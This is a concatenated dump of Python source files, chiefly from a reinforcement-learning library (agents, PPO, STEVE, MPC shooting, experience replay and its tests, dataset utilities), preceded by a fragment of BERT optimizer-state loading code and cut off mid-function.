# do not change groups: {'weight_decay': 0.01, 'lr': 9.995e-06, 'schedule': 'warmup_linear', 'warmup': 0.1, 't_total': 400000, 'b1': 0.9, 'b2': 0.999, 'e': 1e-06, 'max_grad_norm': 1.0, 'params': [...]}
# # Update parameter groups, setting their 'params' value
# def update_group(group, new_group):
# new_group['params'] = group['params']
# return new_group
# param_groups = [
# update_group(g, ng) for g, ng in zip(groups[:num_load_group], saved_groups[:num_load_group])]
# # handle additional params
# param_groups.extend(groups[num_load_group:])
self.__setstate__({'state': state, 'param_groups': groups})
def find_state_dict_subset_finetune(org_state_dict, org_name_list, no_decay, param_optimizer):
# only use the bert encoder and embeddings
want_name_set = set()
for n in org_name_list:
if ('bert.encoder' in n) or ('bert.embeddings' in n):
want_name_set.add(n)
# original: name to pid, pid to name
org_grouped_names = [[n for n in org_name_list if not any(nd in n for nd in no_decay)],
[n for n in org_name_list if any(nd in n for nd in no_decay)]]
org_n2id, org_id2n = {}, {}
for ng, pg in zip(org_grouped_names, org_state_dict['param_groups']):
for n, pid in zip(ng, pg['params']):
org_n2id[n] = pid
org_id2n[pid] = n
# group by: whether pretrained; whether weight decay
g_np_list = [
[(n, p) for n, p in param_optimizer if n in want_name_set and not any(
nd in n for nd in no_decay)],
[(n, p) for n, p in param_optimizer if n in want_name_set and any(
nd in n for nd in no_decay)],
[(n, p) for n, p in param_optimizer if n not in want_name_set and not any(
nd in n for nd in no_decay)],
[(n, p) for n, p in param_optimizer if n not in want_name_set and any(
nd in n for nd in no_decay)],
]
optimizer_grouped_parameters = [
{'params': [p for n, p in g_np_list[0]], 'weight_decay': 0.01},
{'params': [p for n, p in g_np_list[1]], 'weight_decay': 0.0},
{'params': [p for n, p in g_np_list[2]], 'weight_decay': 0.01},
{'params': [p for n, p in g_np_list[3]], 'weight_decay': 0.0}
]
new_state_dict = {}
# regroup the original state_dict
new_state_dict['state'] = {pid: v for pid, v in org_state_dict['state'].items(
) if pid not in org_id2n or org_id2n[pid] in want_name_set}
# reset step count to 0
for pid, st in new_state_dict['state'].items():
st['step'] = 0
def _filter_group(group, g_np_list, i, org_n2id):
packed = {k: v for k, v in group.items() if k != 'params'}
packed['params'] = [pid for pid in group['params']
if pid in org_id2n and org_id2n[pid] in want_name_set]
assert len(g_np_list[i]) == len(packed['params'])
# keep them the same order
packed['params'] = [org_n2id[n] for n, p in g_np_list[i]]
return packed
new_state_dict['param_groups'] = [_filter_group(
g, g_np_list, i, org_n2id) for i, g in enumerate(org_state_dict['param_groups'])]
return new_state_dict, optimizer_grouped_parameters
``` |
{
"source": "4kubo/rllib",
"score": 3
} |
#### File: agent/off_policy/fve_agent.py
```python
import torch.nn.modules.loss as loss
from torch.optim import Adam
from rllib.algorithms.fitted_value_evaluation import FittedValueEvaluationAlgorithm
from rllib.value_function import NNQFunction
from .off_policy_agent import OffPolicyAgent
class FittedValueEvaluationAgent(OffPolicyAgent):
"""Fitted value evaluation agent.
It just evaluates the critic collecting data using fitted td-learning.
References
----------
<NAME>., & <NAME>. (2008).
Finite-Time Bounds for Fitted Value Iteration. JMLR.
"""
def __init__(self, critic, policy, criterion=loss.MSELoss, *args, **kwargs):
super().__init__(*args, **kwargs)
self.algorithm = FittedValueEvaluationAlgorithm(
policy=policy,
critic=critic,
criterion=criterion(reduction="none"),
*args,
**kwargs,
)
self.policy = self.algorithm.policy
@classmethod
def default(cls, environment, policy, critic=None, lr=3e-4, *args, **kwargs):
"""See `AbstractAgent.default'."""
if critic is None:
critic = NNQFunction.default(environment)
optimizer = Adam(critic.parameters(), lr=lr)
return super().default(
environment,
policy=policy,
critic=critic,
optimizer=optimizer,
*args,
**kwargs,
)
```
#### File: agent/tests/test_q_learning_agent.py
```python
import pytest
import torch
import torch.optim
import torch.testing
from rllib.agent import DDQNAgent, DQNAgent, QLearningAgent
from rllib.dataset import ExperienceReplay
from rllib.environment import GymEnvironment
from rllib.environment.mdps import EasyGridWorld
from rllib.policy import EpsGreedy, MellowMax, SoftMax
from rllib.util.training.agent_training import evaluate_agent, train_agent
from rllib.value_function import NNQFunction, TabularQFunction
NUM_EPISODES = 10
MAX_STEPS = 25
TARGET_UPDATE_FREQUENCY = 4
TARGET_UPDATE_TAU = 0.1
MEMORY_MAX_SIZE = 5000
BATCH_SIZE = 64
LEARNING_RATE = 0.001
GAMMA = 0.99
EPS_START = 1.0
EPS_END = 0.01
EPS_DECAY = 500
LAYERS = [64, 64]
SEED = 0
@pytest.fixture(params=["CartPole-v0", "NChain-v0"])
def environment(request):
return request.param
@pytest.fixture(params=[QLearningAgent, DQNAgent, DDQNAgent])
def agent(request):
return request.param
@pytest.fixture(params=[EpsGreedy, SoftMax, MellowMax])
def policy(request):
return request.param
def test_policies(environment, policy):
environment = GymEnvironment(environment, SEED)
critic = NNQFunction(
dim_state=environment.dim_observation,
dim_action=environment.dim_action,
num_states=environment.num_states,
num_actions=environment.num_actions,
layers=LAYERS,
tau=TARGET_UPDATE_TAU,
)
policy = policy(critic, 0.1)
optimizer = torch.optim.Adam(critic.parameters(), lr=LEARNING_RATE)
criterion = torch.nn.MSELoss
memory = ExperienceReplay(max_len=MEMORY_MAX_SIZE)
agent = DDQNAgent(
critic=critic,
policy=policy,
criterion=criterion,
optimizer=optimizer,
memory=memory,
batch_size=BATCH_SIZE,
target_update_frequency=TARGET_UPDATE_FREQUENCY,
gamma=GAMMA,
)
train_agent(
agent,
environment,
num_episodes=NUM_EPISODES,
max_steps=MAX_STEPS,
plot_flag=False,
)
evaluate_agent(agent, environment, 1, MAX_STEPS, render=False)
agent.logger.delete_directory() # Cleanup directory.
def test_tabular_interaction(agent, policy):
LEARNING_RATE = 0.1
environment = EasyGridWorld()
critic = TabularQFunction(
num_states=environment.num_states, num_actions=environment.num_actions
)
policy = policy(critic, 0.1)
optimizer = torch.optim.Adam(critic.parameters(), lr=LEARNING_RATE)
criterion = torch.nn.MSELoss
memory = ExperienceReplay(max_len=MEMORY_MAX_SIZE)
agent = agent(
critic=critic,
policy=policy,
criterion=criterion,
optimizer=optimizer,
memory=memory,
batch_size=BATCH_SIZE,
target_update_frequency=TARGET_UPDATE_FREQUENCY,
gamma=GAMMA,
)
train_agent(
agent,
environment,
num_episodes=NUM_EPISODES,
max_steps=MAX_STEPS,
plot_flag=False,
)
evaluate_agent(agent, environment, 1, MAX_STEPS, render=False)
agent.logger.delete_directory() # Cleanup directory.
torch.testing.assert_allclose(
critic.table.shape,
torch.Size([environment.num_actions, environment.num_states, 1]),
)
```
#### File: algorithms/mpc/random_shooting.py
```python
from .cem_shooting import CEMShooting
class RandomShooting(CEMShooting):
r"""Random Shooting solves the MPC problem by random sampling.
The sampling distribution is a Multivariate Gaussian and the average of the best
`num_elites' samples (action sequences) is returned.
In practice, this is just is the first step of the Cross Entropy Method (n_iter=1).
Parameters
----------
dynamical_model: state transition model.
reward_model: reward model.
num_model_steps: int.
Horizon to solve planning problem.
gamma: float, optional.
Discount factor.
num_particles: int, optional.
Number of particles for shooting method.
num_elites: int, optional.
Number of elite samples to keep between iterations.
termination: Callable, optional.
Termination condition.
terminal_reward: terminal reward model, optional.
warm_start: bool, optional.
Whether or not to start the optimization with a warm start.
default_action: str, optional.
Default action behavior.
References
----------
<NAME>., <NAME>., <NAME>., & <NAME>. (2018).
Neural network dynamics for model-based deep reinforcement learning with model-free
fine-tuning. ICRA.
<NAME>. (2005).
Robust constrained model predictive control. Ph. D.
<NAME>. (2009).
A survey of numerical methods for optimal control.
Advances in the Astronautical Sciences.
"""
def __init__(self, *args, **kwargs):
super().__init__(num_iter=kwargs.pop("num_iter", 1), *args, **kwargs)
```
#### File: rllib/algorithms/ppo.py
```python
import torch
import torch.distributions
from rllib.dataset.datatypes import Loss
from rllib.util.neural_networks.utilities import resume_learning
from rllib.util.parameter_decay import Constant, ParameterDecay
from .trpo import TRPO
class PPO(TRPO):
"""Proximal Policy Optimization algorithm..
The PPO algorithm returns a loss that is a combination of three losses.
- The clipped surrogate objective (Eq. 7).
- The value function error (Eq. 9).
- A policy entropy bonus.
Parameters
----------
policy : AbstractPolicy
value_function : AbstractValueFunction
criterion: Type[_Loss], optional.
Criterion for value function.
epsilon: float, optional (default=0.2)
The clipping parameter.
monte_carlo_target: bool, optional. (default=False).
Whether to calculate the value targets using MC estimation or adv + value.
clamp_value: bool, optional. (default=False).
Whether to clamp the value estimate before computing the value loss.
lambda_: float, optional. (default=0.97).
Parameter for Advantage estimation.
gamma: float, optional. (default=1).
Discount factor.
References
----------
<NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2017).
Proximal policy optimization algorithms. ArXiv.
<NAME>., et al. (2020).
Implementation Matters in Deep Policy Gradients: A Case Study on PPO and TRPO. ICLR.
"""
def __init__(self, epsilon=0.2, clamp_value=False, *args, **kwargs):
super().__init__(
epsilon_mean=0, epsilon_var=0, kl_regularization=True, *args, **kwargs
)
if not isinstance(epsilon, ParameterDecay):
epsilon = Constant(epsilon)
self.epsilon = epsilon
self.clamp_value = clamp_value
def reset(self):
"""Reset the optimization (kl divergence) for the next epoch."""
super().reset()
# Resume learning after early stopping.
resume_learning(self.policy)
def actor_loss(self, trajectory):
"""Get actor loss."""
state, action, reward, next_state, done, *r = trajectory
_, ratio = self.get_log_p_and_ope_weight(state, action)
with torch.no_grad():
adv = self.returns(trajectory)
if self.standardize_returns:
adv = (adv - adv.mean()) / (adv.std() + self.eps)
# Compute surrogate loss.
adv = self.multi_objective_reduction(adv)
weighted_advantage = ratio * adv
clipped_advantage = ratio.clamp(1 - self.epsilon(), 1 + self.epsilon()) * adv
surrogate_loss = -torch.min(weighted_advantage, clipped_advantage)
# Instead of using the Trust-region, TRPO takes the minimum in line 80.
return Loss(policy_loss=surrogate_loss).reduce(self.criterion.reduction)
def get_value_prediction(self, observation):
"""Clamp predicted value."""
value_prediction = super().get_value_prediction(observation)
if self.clamp_value:
old_value_pred = self.critic_target(observation.state).detach()
value_prediction = torch.max(
torch.min(value_prediction, old_value_pred + self.epsilon()),
old_value_pred - self.epsilon(),
)
return value_prediction
```
#### File: rllib/algorithms/steve.py
```python
import torch
from rllib.dataset.datatypes import Loss
from rllib.dataset.utilities import stack_list_of_tuples
from rllib.model.utilities import PredictionStrategy
from rllib.util.multiprocessing import run_parallel_returns
from rllib.util.value_estimation import n_step_return
from rllib.value_function import NNEnsembleQFunction
from .mve import MVE
class STEVE(MVE):
"""Stochastic Ensemble Algorithm using STEVE to calculate targets.
Overrides get_value_target() method.
References
----------
<NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2018).
Sample-efficient reinforcement learning with stochastic ensemble value
expansion. NeuRIPS.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
try:
num_q = self.critic_target.num_heads
except AttributeError:
num_q = 1
try:
num_models = self.dynamical_model.base_model.num_heads
except AttributeError:
num_models = 1
self.num_models = num_models
self.num_q = num_q
def model_augmented_critic_loss(self, observation):
"""Get Model-Based critic-loss."""
pred_q = self.base_algorithm.get_value_prediction(observation)
# Get target_q with semi-gradients.
with torch.no_grad():
target_q = self.get_value_target(observation)
if pred_q.shape != target_q.shape: # Reshape in case of ensembles.
assert isinstance(self.critic, NNEnsembleQFunction)
target_q = target_q.unsqueeze(-1).repeat_interleave(
self.critic.num_heads, -1
)
critic_loss = self.base_algorithm.criterion(pred_q, target_q)
return Loss(critic_loss=critic_loss)
def _get_member_target(self, model_idx, state, action, critic_target):
"""Get member target.
Notes
-----
Helper method to paralelize the calculation through processes.
"""
self.dynamical_model.set_head(model_idx)
self.reward_model.set_head(model_idx)
with torch.no_grad():
trajectory = self.simulation_algorithm.simulate(
state, self.policy, initial_action=action
)
observation = stack_list_of_tuples(trajectory, dim=state.ndim - 2)
n_step_returns = n_step_return(
observation,
gamma=self.gamma,
value_function=self.value_function,
reward_transformer=self.reward_transformer,
entropy_regularization=self.entropy_loss.eta.item(),
reduction="none",
) # samples*batch x horizon x num_q
value = n_step_returns.reshape(
-1, 1, self.num_particles, self.num_model_steps, self.num_q
)
return value
def get_value_target(self, observation):
"""Rollout model and call base algorithm with transitions."""
critic_target = torch.zeros(
observation.state.shape[: -len(self.dynamical_model.dim_state)]
+ (
self.num_particles,
self.num_model_steps + 1,
self.num_models,
self.num_q,
)
) # Critic target shape B x (H + 1) x M x Q
td_return = n_step_return(
observation,
gamma=self.gamma,
value_function=self.value_function,
reward_transformer=self.reward_transformer,
entropy_regularization=self.entropy_loss.eta.item(),
reduction="none",
)
td_samples = td_return.unsqueeze(-2).repeat_interleave(self.num_particles, -2)
td_model = td_samples.unsqueeze(-2).repeat_interleave(self.num_models, -2)
if td_model.shape != critic_target[..., -1, :, :].shape:
td_model = td_model.unsqueeze(1)
critic_target[..., -1, :, :] = td_model
with PredictionStrategy(
self.dynamical_model, self.reward_model, prediction_strategy="set_head"
), torch.no_grad():
state = observation.state[..., 0, :]
action = observation.action[..., 0, :]
value = run_parallel_returns(
self._get_member_target,
[(i, state, action, critic_target) for i in range(self.num_models)],
)
critic_target[..., :-1, :, :] = torch.stack(value, dim=4)
mean_target = critic_target.mean(dim=(2, 4, 5)) # (samples, models, qs)
weight_target = 1 / (self.eps + critic_target.var(dim=(2, 4, 5)))
weights = weight_target / weight_target.sum(-1, keepdim=True)
target_q = (weights * mean_target).sum(-1)
return target_q
```
#### File: experience_replay/tests/test_experience_replay.py
```python
import numpy as np
import pytest
from rllib.dataset import ExperienceReplay
from rllib.dataset.datatypes import Observation
from rllib.dataset.transforms import (
ActionNormalizer,
MeanFunction,
RewardClipper,
StateNormalizer,
)
from rllib.environment import GymEnvironment
from rllib.util.rollout import step_env
def create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
):
"""Rollout an environment and return an Experience Replay Buffer."""
if discrete:
env = GymEnvironment("NChain-v0")
transformations = []
else:
env = GymEnvironment("Pendulum-v1")
transformations = [
MeanFunction(lambda state_, action_: state_),
StateNormalizer(),
ActionNormalizer(),
RewardClipper(),
]
memory = ExperienceReplay(
max_len, transformations=transformations, num_memory_steps=num_memory_steps
)
for _ in range(num_episodes):
state = env.reset()
for _ in range(episode_length):
action = env.action_space.sample() # sample a random action.
observation, state, done, info = step_env(
env, state, action, action_scale=1.0
)
memory.append(observation)
memory.end_episode()
return memory
def create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, num_transitions
):
"""Create a memory with `num_transitions' transitions."""
if discrete:
num_states, num_actions = dim_state, dim_action
dim_state, dim_action = (), ()
else:
num_states, num_actions = -1, -1
dim_state, dim_action = (dim_state,), (dim_action,)
memory = ExperienceReplay(max_len, num_memory_steps=num_memory_steps)
for _ in range(num_transitions):
observation = Observation.random_example(
dim_state=dim_state,
dim_action=dim_action,
num_states=num_states,
num_actions=num_actions,
)
memory.append(observation)
return memory
class TestExperienceReplay(object):
"""Test experience replay class."""
@pytest.fixture(scope="class", params=[True, False])
def discrete(self, request):
return request.param
@pytest.fixture(scope="class", params=[1, 4])
def dim_state(self, request):
return request.param
@pytest.fixture(scope="class", params=[1, 4])
def dim_action(self, request):
return request.param
@pytest.fixture(scope="class", params=[100, 20000])
def max_len(self, request):
return request.param
@pytest.fixture(scope="class", params=[0, 1, 5])
def num_memory_steps(self, request):
return request.param
@pytest.fixture(scope="class", params=[1, 64])
def batch_size(self, request):
return request.param
def _test_sample_batch(self, memory, batch_size, num_memory_steps):
observation, idx, weight = memory.sample_batch(batch_size=batch_size)
for attribute in observation:
if num_memory_steps == 0:
assert attribute.shape[:2] == (batch_size, 1)
else:
assert attribute.shape[:2] == (batch_size, num_memory_steps)
assert idx.shape == (batch_size,)
assert weight.shape == (batch_size,)
def test_sample_batch_from_episode(
self, discrete, max_len, num_memory_steps, batch_size
):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
self._test_sample_batch(memory, batch_size, num_memory_steps)
def test_sample_batch_from_transitions(
self, discrete, dim_state, dim_action, max_len, num_memory_steps, batch_size
):
memory = create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, 200
)
self._test_sample_batch(memory, batch_size, num_memory_steps)
def test_reset(self, discrete, max_len, num_memory_steps):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
assert memory.data_count == num_episodes * (episode_length + num_memory_steps)
if num_memory_steps == 0:
assert len(memory.valid_indexes) == min(max_len, memory.data_count)
else:
assert len(memory.valid_indexes) > 0
assert len(memory.valid_indexes) < len(memory)
assert memory.ptr != 0
assert not np.all(memory.memory == np.full((max_len,), None))
memory.reset()
assert memory.data_count == 0
assert len(memory.valid_indexes) == 0
assert memory.ptr == 0
assert np.all(memory.memory == np.full((max_len,), None))
def test_end_episode(
self, discrete, dim_state, dim_action, max_len, num_memory_steps
):
num_transitions = 200
memory = create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, num_transitions
)
ptr = memory.ptr
memory.end_episode()
assert ptr + num_memory_steps == memory.ptr
for i in range(num_memory_steps):
assert memory.valid[memory.ptr - i - 1] == 0
def test_append_invalid(
self, discrete, dim_state, dim_action, max_len, num_memory_steps
):
num_transitions = 200
memory = create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, num_transitions
)
memory.append_invalid()
assert memory.valid[(memory.ptr - 1) % max_len] == 0
assert memory.valid[(memory.ptr - 2) % max_len] == 1
def test_append(self, discrete, dim_state, dim_action, max_len, num_memory_steps):
num_transitions = 200
memory = create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, num_transitions
)
if discrete:
num_states, num_actions = dim_state, dim_action
dim_state, dim_action = (), ()
else:
num_states, num_actions = -1, -1
dim_state, dim_action = (dim_state,), (dim_action,)
observation = Observation.random_example(
dim_state=dim_state,
dim_action=dim_action,
num_states=num_states,
num_actions=num_actions,
)
memory.append(observation)
assert memory.valid[(memory.ptr - 1) % max_len] == 1
assert memory.valid[(memory.ptr - 2) % max_len] == 1
for i in range(num_memory_steps):
assert memory.valid[(memory.ptr + i) % max_len] == 0
assert memory.memory[(memory.ptr - 1) % max_len] is not observation
def test_len(self, discrete, dim_state, dim_action, max_len, num_memory_steps):
num_transitions = 200
memory = create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, num_transitions
)
assert len(memory) == min(max_len, num_transitions)
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
if num_memory_steps == 0:
assert len(memory) == len(memory.valid_indexes)
else:
assert len(memory) > len(memory.valid_indexes)
assert len(memory) == min(
max_len, num_episodes * (episode_length + num_memory_steps)
)
def test_get_item(self, discrete, max_len, num_memory_steps):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
memory.end_episode()
observation, idx, weight = memory[0]
for attribute in Observation(**observation):
assert attribute.shape[0] == max(1, num_memory_steps)
assert idx == 0
assert weight == 1.0
for i in range(len(memory)):
observation, idx, weight = memory[i]
for attribute in Observation(**observation):
assert attribute.shape[0] == max(1, num_memory_steps)
if memory.valid[i]:
assert idx == i
else:
assert idx != i
assert weight == 1.0
i = np.random.choice(memory.valid_indexes).item()
observation, idx, weight = memory[i]
for attribute in Observation(**observation):
assert attribute.shape[0] == max(1, num_memory_steps)
assert idx == i
assert weight == 1.0
def test_is_full(self, discrete, dim_state, dim_action, max_len, num_memory_steps):
num_transitions = 98
memory = create_er_from_transitions(
discrete, dim_state, dim_action, max_len, num_memory_steps, num_transitions
)
if num_transitions >= max_len:
assert memory.is_full
else:
assert not memory.is_full
memory.end_episode()
if num_transitions + num_memory_steps >= max_len:
assert memory.is_full
else:
assert not memory.is_full
def test_all_data(self, discrete, max_len, num_memory_steps):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
observation = memory.all_data
len_valid_data = len(memory.valid_indexes)
if memory.is_full:
for attribute in observation:
assert attribute.shape[0] == max_len - num_memory_steps
assert attribute.shape[0] == len_valid_data
else:
for attribute in observation:
assert attribute.shape[0] == num_episodes * episode_length
assert attribute.shape[0] == len_valid_data
def test_num_memory_steps(self, discrete, max_len, num_memory_steps):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
self._test_sample_batch(memory, 10, num_memory_steps)
assert memory.num_memory_steps == num_memory_steps
memory.num_memory_steps = 10
assert memory.num_memory_steps == 10
self._test_sample_batch(memory, 10, 10)
memory.num_memory_steps = 2
assert memory.num_memory_steps == 2
self._test_sample_batch(memory, 10, 2)
def test_append_error(self):
memory = ExperienceReplay(max_len=100)
with pytest.raises(TypeError):
memory.append((1, 2, 3, 4, 5))
def test_valid_indexes(self, discrete, max_len, num_memory_steps):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
for i in memory.valid_indexes:
assert memory.valid[i] == 1
if not memory.is_full:
assert len(memory.valid_indexes) == num_episodes * episode_length
else:
assert len(memory.valid_indexes) == max_len - num_memory_steps
def test_iter(self, discrete, max_len, num_memory_steps):
num_episodes = 3
episode_length = 200
memory = create_er_from_episodes(
discrete, max_len, num_memory_steps, num_episodes, episode_length
)
for idx, (observation, idx_, weight) in enumerate(memory):
if idx >= len(memory):
continue
if memory.valid[idx] == 1:
assert idx == idx_
else:
assert idx != idx_
assert weight == 1.0
for attribute in Observation(**observation):
assert attribute.shape[0] == max(1, num_memory_steps)
```
#### File: transforms/tests/test_transforms_utilities.py
```python
import pytest
import torch
import torch.testing
from rllib.dataset.transforms.normalizer import Normalizer
from rllib.util.utilities import get_backend
@pytest.fixture(params=[True, False])
def preserve_origin(request):
return request.param
def test_backend():
assert torch == get_backend(torch.randn(4))
def test_update(preserve_origin):
array = torch.randn(32, 4)
transformer = Normalizer(dim=(4,), preserve_origin=preserve_origin)
transformer.update(array)
torch.testing.assert_allclose(transformer.mean, torch.mean(array, 0))
torch.testing.assert_allclose(transformer.variance, torch.var(array, 0))
def test_normalize(preserve_origin):
array = torch.randn(32, 4)
new_array = torch.randn(4)
transformer = Normalizer(dim=(4,), preserve_origin=preserve_origin)
transformer.update(array)
transformed_array = transformer(new_array)
if preserve_origin:
mean = 0
scale = torch.sqrt(torch.var(array, 0) + torch.mean(array, 0) ** 2)
else:
mean = torch.mean(array, 0)
scale = torch.sqrt(torch.var(array, 0))
torch.testing.assert_allclose(transformed_array, (new_array - mean) / scale)
def test_unnormalize():
array = torch.randn(32, 4)
new_array = torch.randn(4)
transformer = Normalizer(dim=(4,), preserve_origin=preserve_origin)
transformer.update(array)
transformed_array = transformer(new_array)
back_array = transformer.inverse(transformed_array)
torch.testing.assert_allclose(back_array, new_array)
def test_sequential_update():
torch.manual_seed(0)
array = torch.randn(16, 4)
transformer = Normalizer(dim=(4,), preserve_origin=preserve_origin)
transformer.update(array)
torch.testing.assert_allclose(transformer.mean, torch.mean(array, 0))
torch.testing.assert_allclose(transformer.variance, torch.var(array, 0))
for _ in range(10):
new_array = torch.randn(torch.randint(1, 32, (1,)), 4)
transformer.update(new_array)
array = torch.cat((array, new_array), dim=0)
torch.testing.assert_allclose(transformer.mean, torch.mean(array, 0))
torch.testing.assert_allclose(transformer.variance, torch.var(array, 0))
```
#### File: rllib/dataset/utilities.py
```python
from itertools import product
import numpy as np
import torch
from .datatypes import Observation
def _cast_to_iter_class(generator, class_):
if class_ in (tuple, list):
return class_(generator)
else:
return class_(*generator)
def map_observation(func, observation):
"""Map observations through the function func."""
return Observation(*map(lambda x: func(x), observation))
def map_and_cast(fun, iter_):
"""Map a function on a iterable and recast the resulting generator.
Parameters
----------
fun : callable
iter_ : iterable
"""
generator = map(fun, zip(*iter_))
return _cast_to_iter_class(generator, iter_[0].__class__)
def average_named_tuple(named_tuple_):
"""Return an averaged named-tuple."""
return type(named_tuple_)(*map(lambda x: x.mean().item(), named_tuple_))
def average_dataclass(dataclass_):
"""Return an averaged data-class."""
d = []
for val in dataclass_:
d.append(val.mean().item())
return type(dataclass_)(*d)
def stack_list_of_tuples(iter_, dim=None):
"""Convert a list of observation tuples to a list of numpy arrays.
Parameters
----------
iter_: list
Each entry represents one row in the resulting vectors.
dim: int, optional (default=0).
Returns
-------
*arrays
One stacked array for each entry in the tuple.
"""
try:
if dim is None:
generator = map(torch.stack, zip(*iter_))
else:
generator = map(
lambda x: torch.stack(
x, dim=(dim if x[0].ndim > max(dim, -dim - 1) else -1)
),
zip(*iter_),
)
return _cast_to_iter_class(generator, iter_[0].__class__)
except (TypeError, AttributeError):
generator = map(np.stack, zip(*iter_))
return _cast_to_iter_class(generator, iter_[0].__class__)
def bootstrap_trajectory(trajectory, bootstraps):
"""Bootstrap a trajectory into `bootstrap' different i.i.d. trajectories."""
num_points = len(trajectory)
new_trajectories = []
for _ in range(bootstraps):
idx = np.random.choice(num_points, num_points, replace=True)
t = []
for i in idx:
t.append(trajectory[i])
new_trajectories.append(t)
return new_trajectories
def batch_trajectory_to_single_trajectory(trajectory):
"""Convert a batch trajectory into a single trajectory.
A batch trajectory contains a list of batch observations, e.g., Observations with
states that have b x h x dim_states dimensions.
Return a Trajectory that have just 1 x dim_states.
"""
batch_shape = trajectory[0].state.shape[:-1]
out = []
for batch_obs in trajectory:
expanded_obs = Observation(
*[k.repeat(batch_shape) if k.dim() < 1 else k for k in batch_obs]
)
squeezed_obs = Observation(
*[k.reshape(-1, *k.shape[len(batch_shape) :]) for k in expanded_obs]
)
out += [Observation(*k) for k in zip(*squeezed_obs)]
return out
def concatenate_observations(observation, new_observation):
"""Concatenate observations and return a new observation."""
return Observation(
*[
torch.cat((a, b.unsqueeze(0)), dim=0)
for a, b in zip(observation, new_observation)
]
)
def gather_trajectories(trajectories, gather_dim=1):
"""Gather parallel trajectories.
Parameters
----------
trajectories: List[Trajectory].
gather_dim: int, optional. (default=1).
"""
batch_trajectories = [stack_list_of_tuples(traj) for traj in trajectories]
trajectory = Observation(
*map(
lambda args: torch.cat(args, dim=gather_dim)
if args[0].dim() > 1
else torch.stack(args, -1),
zip(*batch_trajectories),
)
)
return trajectory
def unstack_observations(observation):
"""Unstack observations in a list."""
in_dim = observation.reward.shape[:-1]
# don't consider the last reward dimension.
# this changed after making the rewards multi-dimensional.
observations = []
for indexes in product(*map(range, in_dim)):
def _extract_index(tensor):
try:
return tensor[indexes]
except IndexError:
return tensor
observations.append(map_observation(_extract_index, observation))
return observations
def chunk(array, num_memory_steps):
"""Chunk an array into size of N steps.
The array of size N x k_1 x ... k_n will be reshaped to be of size
Batch x num_memory_steps x k_1 x ... k_n.
Parameters
----------
array: Array.
Array to reshape.
num_memory_steps: int.
Number of steps to chunk the batch.
Returns
-------
array: Array.
Chunked Array.
"""
batch_size = array.shape[0] // num_memory_steps
return array.reshape(batch_size, num_memory_steps, *array.shape[1:])
def d4rl_to_observation(dataset):
"""Transform a d4rl dataset into an observation dataset.
Parameters
----------
dataset: Dict.
Dict with dataset.
Returns
-------
observation: Observation
Dataset in observation format..
"""
num_points = dataset["observations"].shape[0]
dim_state = dataset["observations"].shape[1]
dim_actions = dataset["actions"].shape[1]
dataset = Observation(
state=dataset["observations"].reshape(num_points, 1, dim_state),
action=dataset["actions"].reshape(num_points, 1, dim_actions),
reward=dataset["rewards"].reshape(num_points, 1, 1),
next_state=dataset["next_observations"].reshape(num_points, 1, dim_state),
done=dataset["terminals"].reshape(num_points, 1, 1),
log_prob_action=dataset["infos/action_log_probs"].reshape(num_points, 1, 1),
).to_torch()
return dataset
def split_observations_by_done(observation):
"""Split an observation into a list of observations."""
end_indexes = torch.where(observation.done)[0]
start_indexes = torch.cat((torch.tensor([0]), end_indexes + 1))[:-1]
observations = []
def _extract_index(tensor, start_index_, end_index_):
try:
return tensor[start_index_ : end_index_ + 1]
except IndexError:
return tensor
for start_index, end_index in zip(start_indexes, end_indexes):
observations.append(
map_observation(
lambda x: _extract_index(x, start_index, end_index), observation
)
)
return observations
def drop_last(observation, k):
"""Drop last k indexes from observation."""
#
def _extract_index(tensor):
try:
return tensor[:-k]
except IndexError:
return tensor
return map_observation(_extract_index, observation)
def _observation_to_num_memory_steps_with_repeat(observation, num_memory_steps):
"""Do something."""
#
def _safe_repeat(tensor):
try:
shape = torch.tensor(tensor.shape)
shape[0] = (shape[0] - num_memory_steps) + 1
shape[1] = num_memory_steps
out = torch.zeros(*shape)
for i in range(num_memory_steps):
first_idx = i
last_idx = first_idx + shape[0]
out[:, i, :] = tensor[first_idx:last_idx, 0, :]
return out
except IndexError:
return tensor
return map_observation(_safe_repeat, observation)
def _observation_to_num_memory_steps(observation, num_memory_steps, repeat=False):
"""Get an observation and chunk it into batches of num_memory_steps."""
if repeat:
return _observation_to_num_memory_steps_with_repeat(
observation, num_memory_steps
)
num_transitions = observation.state.shape[0]
drop_k = num_transitions % num_memory_steps
if drop_k > 0:
# drop last k transitions.
observation = drop_last(observation, drop_k)
def _safe_chunk(tensor):
try:
return chunk(tensor.squeeze(), num_memory_steps)
except IndexError:
return tensor
return map_observation(_safe_chunk, observation)
def observation_to_num_memory_steps(observation, num_memory_steps, repeat=False):
"""Convert an observation to num_memory_steps."""
# split into trajectories
trajectory = split_observations_by_done(observation)
# convert each trajectory to num step chunks
chunked_trajectories = trajectory_to_num_memory_steps(
trajectory, num_memory_steps, repeat=repeat
)
# gather back trajectories into an observation.
return merge_observations(chunked_trajectories)
def trajectory_to_num_memory_steps(trajectory, num_memory_steps, repeat=False):
"""Trajectory to num_memory_steps."""
chunked_observations = []
for observation in trajectory:
chunked_observations.append(
_observation_to_num_memory_steps(
